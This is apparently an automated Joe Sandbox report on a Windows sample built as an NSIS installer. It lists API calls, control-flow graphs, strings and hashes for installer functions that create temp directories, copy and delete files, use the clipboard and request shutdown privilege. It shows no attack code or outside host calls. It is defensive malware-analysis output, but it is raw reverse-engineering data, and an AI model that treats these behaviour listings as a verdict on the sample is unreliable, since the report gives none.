3595->3597 3596 401423 24 API calls 3598 402250 3596->3598 3599 402c41 17 API calls 3597->3599 3600 402054 3599->3600 3601 40206a LoadLibraryExW 3600->3601 3602 40205c GetModuleHandleW 3600->3602 3603 40207b 3601->3603 3601->3604 3602->3601 3602->3603 3613 406703 WideCharToMultiByte 3603->3613 3604->3596 3607 4020c5 3609 405322 24 API calls 3607->3609 3608 40208c 3610 401423 24 API calls 3608->3610 3611 40209c 3608->3611 3609->3611 3610->3611 3611->3598 3612 4020e8 FreeLibrary 3611->3612 3612->3598 3614 40672d GetProcAddress 3613->3614 3615 402086 3613->3615 3614->3615 3615->3607 3615->3608 4391 401735 4392 402c41 17 API calls 4391->4392 4393 40173c SearchPathW 4392->4393 4394 401757 4393->4394 4395 402a35 4396 402c1f 17 API calls 4395->4396 4397 402a3b 4396->4397 4398 402a72 4397->4398 4399 40288b 4397->4399 4401 402a4d 4397->4401 4398->4399 4400 4062dc 17 API calls 4398->4400 4400->4399 4401->4399 4403 406201 wsprintfW 4401->4403 4403->4399 4404 4014b8 4405 4014be 4404->4405 4406 401389 2 API calls 4405->4406 4407 4014c6 4406->4407 4408 401db9 GetDC 4409 402c1f 17 API calls 4408->4409 4410 401dcb GetDeviceCaps MulDiv ReleaseDC 4409->4410 4411 402c1f 17 API calls 4410->4411 4412 401dfc 4411->4412 4413 4062dc 17 API calls 4412->4413 4414 401e39 CreateFontIndirectW 4413->4414 4415 402592 4414->4415 4416 40283b 4417 402843 4416->4417 4418 402847 FindNextFileW 4417->4418 4421 402859 4417->4421 4419 4028a0 4418->4419 4418->4421 4422 4062ba lstrcpynW 4419->4422 4422->4421

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 0040338F Relevance: 75.7, APIs: 33, Strings: 10, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 38 403633-40364d DeleteFileW call 402edd 29->38 39 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->39 30->30 30->31 33 4034c5-4034c9 31->33 34 4034ca-4034ce 31->34 33->34 36 4034d4-4034da 34->36 37 40358d-40359a call 405bbc 34->37 43 4034f5-40352e 36->43 44 4034dc-4034e4 36->44 54 40359c-40359d 37->54 55 40359e-4035a4 37->55 56 403653-403659 38->56 57 4036fe-40370e ExitProcess CoUninitialize 38->57 39->38 52 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 39->52 50 403530-403535 43->50 51 40354b-403585 43->51 48 4034e6-4034e9 44->48 49 4034eb 44->49 48->43 48->49 49->43 50->51 58 403537-40353f 50->58 51->37 53 403587-40358b 51->53 52->38 52->57 53->37 60 4035ac-4035ba call 4062ba 53->60 54->55 55->28 61 4035aa 55->61 62 4036ee-4036f5 call 4039aa 56->62 63 40365f-40366a call 405bbc 56->63 64 403834-40383a 57->64 65 403714-403724 call 405920 ExitProcess 57->65 66 403541-403544 58->66 67 403546 58->67 71 4035bf 60->71 61->71 80 4036fa 62->80 84 4036b8-4036c2 63->84 85 40366c-4036a1 63->85 68 4038b8-4038c0 64->68 69 40383c-403852 GetCurrentProcess OpenProcessToken 64->69 66->51 66->67 67->51 81 4038c2 68->81 82 4038c6-4038ca ExitProcess 68->82 77 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 69->77 78 403888-403896 call 406694 69->78 71->29 77->78 92 4038a4-4038af ExitWindowsEx 78->92 93 403898-4038a2 78->93 80->57 81->82 86 4036c4-4036d2 call 405c97 84->86 87 40372a-40373e call 40588b lstrcatW 84->87 89 4036a3-4036a7 85->89 86->57 102 4036d4-4036ea call 4062ba * 2 86->102 100 403740-403746 lstrcatW 87->100 101 40374b-403765 lstrcatW lstrcmpiW 87->101 94 4036b0-4036b4 89->94 95 4036a9-4036ae 89->95 92->68 99 4038b1-4038b3 call 40140b 92->99 93->92 93->99 94->89 96 4036b6 94->96 95->94 95->96 96->84 99->68 100->101 101->57 105 403767-40376a 101->105 102->62 107 403773 call 40586e 105->107 108 40376c-403771 call 4057f1 105->108 115 403778-403786 SetCurrentDirectoryW 107->115 108->115 116 403793-4037bc call 4062ba 115->116 117 403788-40378e call 4062ba 115->117 121 4037c1-4037dd call 4062dc DeleteFileW 116->121 117->116 124 40381e-403826 121->124 125 4037df-4037ef CopyFileW 121->125 124->121 127 403828-40382f call 406080 124->127 125->124 126 4037f1-403811 call 406080 call 4062dc call 4058a3 125->126 126->124 136 403813-40381a CloseHandle 126->136 127->57 136->124
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(00440208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                                                              • CharNextW.USER32(00000000,004CB000,00000020,004CB000,00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004DF000,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004DF000,00001FFB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004DF000,004DF000,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004DF000,004DF000,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004DF000,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004DB000,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004036FE
                                                                                                                                                                                              • CoUninitialize.COMBASE(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,0040A26C,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,.tmp,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004DF000,004D7000,004DF000,.tmp,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004DF000,004DF000,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                              • DeleteFileW.KERNEL32(0043C208,0043C208,?,0047B000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                              • CopyFileW.KERNEL32(004E7000,0043C208,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0043C208,0043C208,?,0043C208,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                              • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                              • API String ID: 424501083-3195845224
                                                                                                                                                                                              • Opcode ID: d8143391da9922f0f8fdd9eae6183e51d391a53b8ae8d145ad5f2599bc791527
                                                                                                                                                                                              • Instruction ID: 33fbdd78d52bfd04f2c73b4da217482bb076a8c6d1615cdfa2cd3638f3c4bec2
                                                                                                                                                                                              • Opcode Fuzzy Hash: d8143391da9922f0f8fdd9eae6183e51d391a53b8ae8d145ad5f2599bc791527
                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D1F471100310AAE720BF769D45B2B3AADEB4070AF10447FF885B62E1DBBD8D55876E
                                                                                                                                                                                              Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 137 405461-40547c 138 405482-405549 GetDlgItem * 3 call 404266 call 404bbf GetClientRect GetSystemMetrics SendMessageW * 2 137->138 139 40560b-405612 137->139 160 405567-40556a 138->160 161 40554b-405565 SendMessageW * 2 138->161 141 405614-405636 GetDlgItem CreateThread CloseHandle 139->141 142 40563c-405649 139->142 141->142 144 405667-405671 142->144 145 40564b-405651 142->145 149 405673-405679 144->149 150 4056c7-4056cb 144->150 147 405653-405662 ShowWindow * 2 call 404266 145->147 148 40568c-405695 call 404298 145->148 147->144 157 40569a-40569e 148->157 155 4056a1-4056b1 ShowWindow 149->155 156 40567b-405687 call 40420a 149->156 150->148 153 4056cd-4056d3 150->153 153->148 162 4056d5-4056e8 SendMessageW 153->162 158 4056c1-4056c2 call 40420a 155->158 159 4056b3-4056bc call 405322 155->159 156->148 158->150 159->158 166 40557a-405591 call 404231 160->166 167 40556c-405578 SendMessageW 160->167 161->160 168 4057ea-4057ec 162->168 169 4056ee-405719 CreatePopupMenu call 4062dc AppendMenuW 162->169 176 405593-4055a7 ShowWindow 166->176 177 4055c7-4055e8 GetDlgItem SendMessageW 166->177 167->166 168->157 174 40571b-40572b GetWindowRect 169->174 175 40572e-405743 TrackPopupMenu 169->175 174->175 175->168 179 405749-405760 175->179 180 4055b6 176->180 181 4055a9-4055b4 ShowWindow 176->181 177->168 178 4055ee-405606 SendMessageW * 2 177->178 178->168 182 405765-405780 SendMessageW 179->182 183 4055bc-4055c2 call 404266 180->183 181->183 182->182 184 405782-4057a5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 4057a7-4057ce SendMessageW 184->186 186->186 187 4057d0-4057e4 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->168
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                                • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405636
                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040565F
                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                              • String ID: {
                                                                                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                                                                                              • Opcode ID: 3f5756e17ddf514bb7e58e27119461a6e63aa272c655e6837988b65713ff16ec
                                                                                                                                                                                              • Instruction ID: bae72a1d173c3811f2fd5642bc5838002141c6bee16c4b6d0499208050eeb164
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f5756e17ddf514bb7e58e27119461a6e63aa272c655e6837988b65713ff16ec
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CB12970900608FFDB119FA0DE89EAE7B79FB48354F00413AFA45A61A0CBB55E91DF58
                                                                                                                                                                                              Function 004059CC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 497 4059cc-4059f2 call 405c97 500 4059f4-405a06 DeleteFileW 497->500 501 405a0b-405a12 497->501 502 405b88-405b8c 500->502 503 405a14-405a16 501->503 504 405a25-405a35 call 4062ba 501->504 505 405b36-405b3b 503->505 506 405a1c-405a1f 503->506 510 405a44-405a45 call 405bdb 504->510 511 405a37-405a42 lstrcatW 504->511 505->502 509 405b3d-405b40 505->509 506->504 506->505 512 405b42-405b48 509->512 513 405b4a-405b52 call 4065fd 509->513 514 405a4a-405a4e 510->514 511->514 512->502 513->502 521 405b54-405b68 call 405b8f call 405984 513->521 517 405a50-405a58 514->517 518 405a5a-405a60 lstrcatW 514->518 517->518 520 405a65-405a81 lstrlenW FindFirstFileW 517->520 518->520 522 405a87-405a8f 520->522 523 405b2b-405b2f 520->523 537 405b80-405b83 call 405322 521->537 538 405b6a-405b6d 521->538 527 405a91-405a99 522->527 528 405aaf-405ac3 call 4062ba 522->528 523->505 526 405b31 523->526 526->505 531 405a9b-405aa3 527->531 532 405b0e-405b1e FindNextFileW 527->532 539 405ac5-405acd 528->539 540 405ada-405ae5 call 405984 528->540 531->528 533 405aa5-405aad 531->533 532->522 536 405b24-405b25 FindClose 532->536 533->528 533->532 536->523 537->502 538->512 541 405b6f-405b7e call 405322 call 406080 538->541 539->532 542 405acf-405ad3 call 4059cc 539->542 550 405b06-405b09 call 405322 540->550 551 405ae7-405aea 540->551 541->502 549 405ad8 542->549 549->532 550->532 554 405aec-405afc call 405322 call 406080 551->554 555 405afe-405b04 551->555 554->532 555->532
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,004DF000,74DF3420,00000000), ref: 004059F5
                                                                                                                                                                                              • lstrcatW.KERNEL32(00460250,\*.*,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A3D
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A60
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A66
                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00460250,?,?,?,0040A014,?,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A76
                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                              • API String ID: 2035342205-1173974218
                                                                                                                                                                                              • Opcode ID: 381ae1539308b0fff5c23660480c7799636f68814d34eb948432fba1f876741c
                                                                                                                                                                                              • Instruction ID: 3baa02bdf70247edfb0f680676f8bffda79515ede8bd61e7e13478a9eee65f3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 381ae1539308b0fff5c23660480c7799636f68814d34eb948432fba1f876741c
                                                                                                                                                                                              • Instruction Fuzzy Hash: E141D430900914AACB21AB618C89ABF7778EF45369F10427FF801711D1D77CAD81DE6E
                                                                                                                                                                                              Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004DF000,00468298,00464250,00405CE0,00464250,00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420), ref: 00406608
                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                              • Opcode ID: f7cd178be2e6469beafc72b660366141f3ce998a63a06fca00c04ee689428cf9
                                                                                                                                                                                              • Instruction ID: 086872f0bf6ffc0fec3bf9e050170664210a11ef237051a194e92f35cf11c1a2
                                                                                                                                                                                              • Opcode Fuzzy Hash: f7cd178be2e6469beafc72b660366141f3ce998a63a06fca00c04ee689428cf9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52D012315455205BC7001B386E0C85B7B599F553317158F37F46AF51E0DB758C62869D
                                                                                                                                                                                              Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
